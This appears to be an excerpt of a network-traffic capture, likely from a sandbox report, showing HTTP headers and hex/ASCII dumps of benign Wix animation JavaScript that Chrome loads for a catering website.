                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 1010824479 901753947
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 986002821
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 06:17:18 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 27353
                                                                                                                                                                                                                        Last-Modified: Fri, 10 Jan 2025 05:59:16 GMT
                                                                                                                                                                                                                        ETag: "50777a3f69f6f3c8de78fa49e9dd9f43"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC226INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 37 31 5d 2c 7b 38 30 38 30 37 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 41 6e 69 6d 61 74 69 6f 6e 73 3a 28 29 3d 3e 50 61 2e 51 77 2c 45 64 69 74 6f 72 41 6e 69 6d 61 74 69 6f 6e 73 53 79 6d 3a 28 29 3d 3e 50 61 2e 5f 48 2c 6e 61 6d 65 3a 28 29 3d 3e 50 61 2e 55 55 2c 70 61 67 65 3a 28 29 3d 3e 50 77 7d 29 3b 76 61 72 20 6e
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3671],{80807:(e,t,a)=>{a.r(t),a.d(t,{Animations:()=>Pa.Qw,EditorAnimationsSym:()=>Pa._H,name:()=>Pa.UU,page:()=>Pw});var n
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 3d 7b 7d 3b 61 2e 72 28 6e 29 2c 61 2e 64 28 6e 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 4a 61 2c 6e 61 6d 65 3a 28 29 3d 3e 47 61 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 5a 61 7d 29 3b 76 61 72 20 69 3d 7b 7d 3b 61 2e 72 28 69 29 2c 61 2e 64 28 69 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 6e 6e 2c 6e 61 6d 65 3a 28 29 3d 3e 65 6e 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 74 6e 7d 29 3b 76 61 72 20 72 3d 7b 7d 3b 61 2e 72 28 72 29 2c 61 2e 64 28 72 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 73 6e 2c 6e 61 6d 65 3a 28 29 3d 3e 72 6e 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 6f 6e 7d 29 3b 76 61 72 20 6f 3d 7b 7d 3b 61 2e 72 28 6f 29 2c 61 2e 64 28 6f 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 49 6e 2c 6e 61 6d 65 3a 28 29 3d 3e 53 6e 2c
                                                                                                                                                                                                                        Data Ascii: ={};a.r(n),a.d(n,{animate:()=>Ja,name:()=>Ga,properties:()=>Za});var i={};a.r(i),a.d(i,{animate:()=>nn,name:()=>en,properties:()=>tn});var r={};a.r(r),a.d(r,{animate:()=>sn,name:()=>rn,properties:()=>on});var o={};a.r(o),a.d(o,{animate:()=>In,name:()=>Sn,
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 2c 62 61 73 65 53 65 71 75 65 6e 63 65 3a 28 29 3d 3e 79 2c 62 61 73 65 53 6b 65 77 3a 28 29 3d 3e 62 7d 29 3b 76 61 72 20 78 3d 7b 7d 3b 61 2e 72 28 78 29 2c 61 2e 64 28 78 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 67 69 2c 6e 61 6d 65 3a 28 29 3d 3e 66 69 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 68 69 7d 29 3b 76 61 72 20 5f 3d 7b 7d 3b 61 2e 72 28 5f 29 2c 61 2e 64 28 5f 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 76 69 2c 6e 61 6d 65 3a 28 29 3d 3e 79 69 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 62 69 7d 29 3b 76 61 72 20 77 3d 7b 7d 3b 61 2e 72 28 77 29 2c 61 2e 64 28 77 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 77 69 2c 6e 61 6d 65 3a 28 29 3d 3e 78 69 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 5f 69 7d 29 3b 76 61 72 20 4f 3d 7b 7d
                                                                                                                                                                                                                        Data Ascii: ,baseSequence:()=>y,baseSkew:()=>b});var x={};a.r(x),a.d(x,{animate:()=>gi,name:()=>fi,properties:()=>hi});var _={};a.r(_),a.d(_,{animate:()=>vi,name:()=>yi,properties:()=>bi});var w={};a.r(w),a.d(w,{animate:()=>wi,name:()=>xi,properties:()=>_i});var O={}
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 45 72 2c 6e 61 6d 65 3a 28 29 3d 3e 46 72 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 24 72 7d 29 3b 76 61 72 20 71 3d 7b 7d 3b 61 2e 72 28 71 29 2c 61 2e 64 28 71 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 58 72 2c 6e 61 6d 65 3a 28 29 3d 3e 41 72 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 59 72 7d 29 3b 76 61 72 20 48 3d 7b 7d 3b 61 2e 72 28 48 29 2c 61 2e 64 28 48 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 4e 72 2c 6e 61 6d 65 3a 28 29 3d 3e 71 72 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 48 72 7d 29 3b 76 61 72 20 56 3d 7b 7d 3b 61 2e 72 28 56 29 2c 61 2e 64 28 56 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 57 72 2c 6e 61 6d 65 3a 28 29 3d 3e 7a 72 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 4c 72 7d
                                                                                                                                                                                                                        Data Ascii: animate:()=>Er,name:()=>Fr,properties:()=>$r});var q={};a.r(q),a.d(q,{animate:()=>Xr,name:()=>Ar,properties:()=>Yr});var H={};a.r(H),a.d(H,{animate:()=>Nr,name:()=>qr,properties:()=>Hr});var V={};a.r(V),a.d(V,{animate:()=>Wr,name:()=>zr,properties:()=>Lr}
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 29 3b 76 61 72 20 72 65 3d 7b 7d 3b 61 2e 72 28 72 65 29 2c 61 2e 64 28 72 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 64 73 2c 6e 61 6d 65 3a 28 29 3d 3e 6f 73 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 73 73 7d 29 3b 76 61 72 20 6f 65 3d 7b 7d 3b 61 2e 72 28 6f 65 29 2c 61 2e 64 28 6f 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 6c 73 2c 6e 61 6d 65 3a 28 29 3d 3e 63 73 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 75 73 7d 29 3b 76 61 72 20 73 65 3d 7b 7d 3b 61 2e 72 28 73 65 29 2c 61 2e 64 28 73 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 66 73 2c 6e 61 6d 65 3a 28 29 3d 3e 6d 73 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 70 73 7d 29 3b 76 61 72 20 64 65 3d 7b 7d 3b 61 2e 72 28 64 65 29 2c 61 2e 64 28 64 65 2c 7b 61 6e 69 6d 61 74 65 3a
                                                                                                                                                                                                                        Data Ascii: );var re={};a.r(re),a.d(re,{animate:()=>ds,name:()=>os,properties:()=>ss});var oe={};a.r(oe),a.d(oe,{animate:()=>ls,name:()=>cs,properties:()=>us});var se={};a.r(se),a.d(se,{animate:()=>fs,name:()=>ms,properties:()=>ps});var de={};a.r(de),a.d(de,{animate:
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 61 72 20 42 65 3d 7b 7d 3b 61 2e 72 28 42 65 29 2c 61 2e 64 28 42 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 68 64 2c 6e 61 6d 65 3a 28 29 3d 3e 70 64 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 66 64 7d 29 3b 76 61 72 20 54 65 3d 7b 7d 3b 61 2e 72 28 54 65 29 2c 61 2e 64 28 54 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 76 64 2c 6e 61 6d 65 3a 28 29 3d 3e 67 64 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 62 64 7d 29 3b 76 61 72 20 50 65 3d 7b 7d 3b 61 2e 72 28 50 65 29 2c 61 2e 64 28 50 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 77 64 2c 6e 61 6d 65 3a 28 29 3d 3e 78 64 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 5f 64 7d 29 3b 76 61 72 20 6b 65 3d 7b 7d 3b 61 2e 72 28 6b 65 29 2c 61 2e 64 28 6b 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d
                                                                                                                                                                                                                        Data Ascii: ar Be={};a.r(Be),a.d(Be,{animate:()=>hd,name:()=>pd,properties:()=>fd});var Te={};a.r(Te),a.d(Te,{animate:()=>vd,name:()=>gd,properties:()=>bd});var Pe={};a.r(Pe),a.d(Pe,{animate:()=>wd,name:()=>xd,properties:()=>_d});var ke={};a.r(ke),a.d(ke,{animate:()=
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 4e 65 3d 7b 7d 3b 61 2e 72 28 4e 65 29 2c 61 2e 64 28 4e 65 2c 7b 48 65 61 64 65 72 46 61 64 65 4f 75 74 3a 28 29 3d 3e 58 65 2c 48 65 61 64 65 72 46 61 64 65 4f 75 74 43 75 73 74 6f 6d 3a 28 29 3d 3e 71 65 2c 48 65 61 64 65 72 4d 6f 76 65 43 75 73 74 6f 6d 3a 28 29 3d 3e 56 65 2c 4d 6f 64 65 73 4d 6f 74 69 6f 6e 4e 6f 44 69 6d 65 6e 73 69 6f 6e 73 3a 28 29 3d 3e 74 65 2c 4d 6f 64 65 73 4d 6f 74 69 6f 6e 4e 6f 53 63 61 6c 65 3a 28 29 3d 3e 61 65 2c 4d 6f 64 65 73 4d 6f 74 69 6f 6e 53 63 61 6c 65 3a 28 29 3d 3e 6e 65 2c 61 72 63 49 6e 3a 28 29 3d 3e 6b 2c 61 72 63 4f 75 74 3a 28 29 3d 3e 48 2c 62 61 63 6b 67 72 6f 75 6e 64 42 6c 75 72 49 6e 3a 28 29 3d 3e 52 65 2c 62 61 63 6b 67 72 6f 75 6e 64 46 61 64 65 49 6e 3a 28 29 3d 3e 43 65 2c 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                        Data Ascii: Ne={};a.r(Ne),a.d(Ne,{HeaderFadeOut:()=>Xe,HeaderFadeOutCustom:()=>qe,HeaderMoveCustom:()=>Ve,ModesMotionNoDimensions:()=>te,ModesMotionNoScale:()=>ae,ModesMotionScale:()=>ne,arcIn:()=>k,arcOut:()=>H,backgroundBlurIn:()=>Re,backgroundFadeIn:()=>Ce,backgro
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 7a 65 3d 7b 7d 3b 61 2e 72 28 7a 65 29 2c 61 2e 64 28 7a 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 53 63 2c 6e 61 6d 65 3a 28 29 3d 3e 54 63 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 50 63 7d 29 3b 76 61 72 20 4c 65 3d 7b 7d 3b 61 2e 72 28 4c 65 29 2c 61 2e 64 28 4c 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 43 63 2c 6e 61 6d 65 3a 28 29 3d 3e 4d 63 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 49 63 7d 29 3b 76 61 72 20 55 65 3d 7b 7d 3b 61 2e 72 28 55 65 29 2c 61 2e 64 28 55 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 44 63 2c 6e 61 6d 65 3a 28 29 3d 3e 45 63 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 41 63 7d 29 3b 76 61 72 20 6a 65 3d 7b 7d 3b 61 2e 72 28 6a 65 29 2c 61 2e 64 28 6a 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 56 63
                                                                                                                                                                                                                        Data Ascii: ze={};a.r(ze),a.d(ze,{animate:()=>Sc,name:()=>Tc,properties:()=>Pc});var Le={};a.r(Le),a.d(Le,{animate:()=>Cc,name:()=>Mc,properties:()=>Ic});var Ue={};a.r(Ue),a.d(Ue,{animate:()=>Dc,name:()=>Ec,properties:()=>Ac});var je={};a.r(je),a.d(je,{animate:()=>Vc
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 3a 28 29 3d 3e 4a 65 2c 66 6f 6c 64 49 6e 4d 6f 62 69 6c 65 3a 28 29 3d 3e 65 74 2c 67 6c 69 64 65 49 6e 4d 6f 62 69 6c 65 3a 28 29 3d 3e 74 74 2c 72 65 76 65 61 6c 4d 6f 62 69 6c 65 3a 28 29 3d 3e 61 74 2c 73 6c 69 64 65 49 6e 4d 6f 62 69 6c 65 3a 28 29 3d 3e 6e 74 2c 73 70 69 6e 49 6e 4d 6f 62 69 6c 65 3a 28 29 3d 3e 69 74 2c 74 75 72 6e 49 6e 4d 6f 62 69 6c 65 3a 28 29 3d 3e 72 74 7d 29 3b 76 61 72 20 73 74 3d 7b 7d 3b 61 2e 72 28 73 74 29 2c 61 2e 64 28 73 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 48 75 2c 6e 61 6d 65 3a 28 29 3d 3e 59 75 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 44 75 7d 29 3b 76 61 72 20 64 74 3d 7b 7d 3b 61 2e 72 28 64 74 29 2c 61 2e 64 28 64 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 4b 75 2c 6e 61 6d 65 3a 28 29 3d
                                                                                                                                                                                                                        Data Ascii: e:()=>Je,foldInMobile:()=>et,glideInMobile:()=>tt,revealMobile:()=>at,slideInMobile:()=>nt,spinInMobile:()=>it,turnInMobile:()=>rt});var st={};a.r(st),a.d(st,{animate:()=>Hu,name:()=>Yu,properties:()=>Du});var dt={};a.r(dt),a.d(dt,{animate:()=>Ku,name:()=
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 29 2c 61 2e 64 28 42 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 6c 6d 2c 6e 61 6d 65 3a 28 29 3d 3e 73 6d 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 64 6d 7d 29 3b 76 61 72 20 54 74 3d 7b 7d 3b 61 2e 72 28 54 74 29 2c 61 2e 64 28 54 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 67 6d 2c 6e 61 6d 65 3a 28 29 3d 3e 6d 6d 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 70 6d 7d 29 3b 76 61 72 20 50 74 3d 7b 7d 3b 61 2e 72 28 50 74 29 2c 61 2e 64 28 50 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 78 6d 2c 6e 61 6d 65 3a 28 29 3d 3e 79 6d 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 62 6d 7d 29 3b 76 61 72 20 6b 74 3d 7b 7d 3b 61 2e 72 28 6b 74 29 2c 61 2e 64 28 6b 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 54 6d 2c 6e 61 6d 65 3a 28 29 3d 3e 5f 6d
                                                                                                                                                                                                                        Data Ascii: ),a.d(Bt,{animate:()=>lm,name:()=>sm,properties:()=>dm});var Tt={};a.r(Tt),a.d(Tt,{animate:()=>gm,name:()=>mm,properties:()=>pm});var Pt={};a.r(Pt),a.d(Pt,{animate:()=>xm,name:()=>ym,properties:()=>bm});var kt={};a.r(kt),a.d(kt,{animate:()=>Tm,name:()=>_m


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        111192.168.2.55005434.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:10 UTC629OUTGET /services/wix-thunderbolt/dist/animations.2164ac2a.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 14156
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: iYVKGrzhoab_QbzIX0P.qkgeVDub6Mlj
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 406267553 789958834
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 961144299
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:54:00 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 273551
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:48:56 GMT
                                                                                                                                                                                                                        ETag: "2508cb0a2fdf98f9e0771e42fcc78a79"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC227INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 37 34 5d 2c 7b 38 31 32 32 30 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 51 66 3a 28 29 3d 3e 72 2c 53 37 3a 28 29 3d 3e 63 2c 54 5f 3a 28 29 3d 3e 6f 2c 74 6e 3a 28 29 3d 3e 73 2c 78 67 3a 28 29 3d 3e 6e 7d 29 3b 63 6f 6e 73 74 20 6e 3d 74 3d 3e 2d 28 4d 61 74 68 2e 63 6f 73 28 4d 61 74 68 2e 50 49 2a 74 29 2d 31 29 2f 32 2c 6f 3d 74 3d 3e 74 3c 2e 35
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[974],{81220:(t,e,i)=>{i.d(e,{Qf:()=>r,S7:()=>c,T_:()=>o,tn:()=>s,xg:()=>n});const n=t=>-(Math.cos(Math.PI*t)-1)/2,o=t=>t<.5
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 3f 32 2a 74 2a 2a 32 3a 31 2d 28 2d 32 2a 74 2b 32 29 2a 2a 32 2f 32 2c 73 3d 74 3d 3e 74 3c 2e 35 3f 28 31 2d 4d 61 74 68 2e 73 71 72 74 28 31 2d 34 2a 74 2a 2a 32 29 29 2f 32 3a 28 4d 61 74 68 2e 73 71 72 74 28 2d 28 32 2a 74 2d 33 29 2a 28 32 2a 74 2d 31 29 29 2b 31 29 2f 32 2c 72 3d 7b 6c 69 6e 65 61 72 3a 74 3d 3e 74 2c 73 69 6e 65 49 6e 3a 74 3d 3e 31 2d 4d 61 74 68 2e 63 6f 73 28 74 2a 4d 61 74 68 2e 50 49 2f 32 29 2c 73 69 6e 65 4f 75 74 3a 74 3d 3e 4d 61 74 68 2e 73 69 6e 28 74 2a 4d 61 74 68 2e 50 49 2f 32 29 2c 73 69 6e 65 49 6e 4f 75 74 3a 6e 2c 71 75 61 64 49 6e 3a 74 3d 3e 74 2a 2a 32 2c 71 75 61 64 4f 75 74 3a 74 3d 3e 31 2d 28 31 2d 74 29 2a 2a 32 2c 71 75 61 64 49 6e 4f 75 74 3a 6f 2c 63 75 62 69 63 49 6e 3a 74 3d 3e 74 2a 2a 33 2c 63 75
                                                                                                                                                                                                                        Data Ascii: ?2*t**2:1-(-2*t+2)**2/2,s=t=>t<.5?(1-Math.sqrt(1-4*t**2))/2:(Math.sqrt(-(2*t-3)*(2*t-1))+1)/2,r={linear:t=>t,sineIn:t=>1-Math.cos(t*Math.PI/2),sineOut:t=>Math.sin(t*Math.PI/2),sineInOut:n,quadIn:t=>t**2,quadOut:t=>1-(1-t)**2,quadInOut:o,cubicIn:t=>t**3,cu
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 2e 32 32 29 22 2c 71 75 61 72 74 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 36 35 2c 20 30 2e 38 34 2c 20 30 2e 34 34 2c 20 31 29 22 2c 71 75 61 72 74 49 6e 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 37 37 2c 20 30 2c 20 30 2e 31 37 35 2c 20 31 29 22 2c 71 75 69 6e 74 49 6e 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 37 35 35 2c 20 30 2e 30 35 2c 20 30 2e 38 35 35 2c 20 30 2e 30 36 29 22 2c 71 75 69 6e 74 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 32 33 2c 20 31 2c 20 30 2e 33 32 2c 20 31 29 22 2c 71 75 69 6e 74 49 6e 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 38 36 2c 20 30 2c 20 30 2e 30 37 2c 20 31 29 22 2c 65 78 70 6f 49 6e 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e
                                                                                                                                                                                                                        Data Ascii: .22)",quartOut:"cubic-bezier(0.165, 0.84, 0.44, 1)",quartInOut:"cubic-bezier(0.77, 0, 0.175, 1)",quintIn:"cubic-bezier(0.755, 0.05, 0.855, 0.06)",quintOut:"cubic-bezier(0.23, 1, 0.32, 1)",quintInOut:"cubic-bezier(0.86, 0, 0.07, 1)",expoIn:"cubic-bezier(0.
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 76 77 29 29 29 5c 73 2a 5c 2b 5c 73 2a 28 2d 3f 5c 64 2b 28 28 70 78 29 7c 28 76 68 29 7c 28 76 77 29 29 29 5c 73 2a 5c 29 5c 73 2a 24 2f 29 3b 72 65 74 75 72 6e 20 6f 28 69 5b 31 5d 2c 65 29 2b 6f 28 69 5b 36 5d 2c 65 29 7d 28 74 2c 65 29 3a 70 61 72 73 65 49 6e 74 28 74 29 7c 7c 30 3a 30 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 2c 69 29 7b 63 6f 6e 73 74 7b 6e 61 6d 65 3a 6e 2c 6f 66 66 73 65 74 3a 6f 3d 30 7d 3d 74 2c 7b 73 74 61 72 74 3a 73 2c 65 6e 64 3a 72 7d 3d 69 2c 63 3d 72 2d 73 2c 75 3d 6f 2f 31 30 30 3b 6c 65 74 20 66 2c 68 3b 72 65 74 75 72 6e 22 65 6e 74 72 79 22 3d 3d 3d 6e 3f 28 66 3d 73 2d 65 2c 68 3d 4d 61 74 68 2e 6d 69 6e 28 65 2c 63 29 29 3a 22 65 6e 74 72 79 2d 63 72 6f 73 73 69 6e 67 22 3d 3d 3d 6e 3f 28 66 3d 73 2d 65 2c 68 3d
                                                                                                                                                                                                                        Data Ascii: vw)))\s*\+\s*(-?\d+((px)|(vh)|(vw)))\s*\)\s*$/);return o(i[1],e)+o(i[6],e)}(t,e):parseInt(t)||0:0}function s(t,e,i){const{name:n,offset:o=0}=t,{start:s,end:r}=i,c=r-s,u=o/100;let f,h;return"entry"===n?(f=s-e,h=Math.min(e,c)):"entry-crossing"===n?(f=s-e,h=
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 6f 6e 73 74 20 74 3d 6f 28 67 2e 61 64 64 2c 63 29 2c 66 3d 72 28 75 2c 73 28 7b 2e 2e 2e 67 2c 6f 66 66 73 65 74 3a 30 7d 2c 69 2c 65 29 2c 73 28 7b 2e 2e 2e 67 2c 6f 66 66 73 65 74 3a 31 30 30 7d 2c 69 2c 65 29 2c 69 2c 6e 29 3b 76 3d 66 2e 73 74 61 72 74 2b 67 2e 6f 66 66 73 65 74 2f 31 30 30 2a 28 66 2e 65 6e 64 2d 66 2e 73 74 61 72 74 29 2b 74 7d 65 6c 73 65 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 76 3d 6c 2b 61 29 7d 72 65 74 75 72 6e 20 64 7c 7c 61 7c 7c 28 64 3d 76 2d 6c 29 2c 7b 2e 2e 2e 74 2c 73 74 61 72 74 3a 6c 2c 65 6e 64 3a 76 2c 73 74 61 72 74 52 61 6e 67 65 3a 70 2c 65 6e 64 52 61 6e 67 65 3a 67 2c 64 75 72 61 74 69 6f 6e 3a 64 7c 7c 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 72 65 74 75 72 6e 22 73 74 69 63
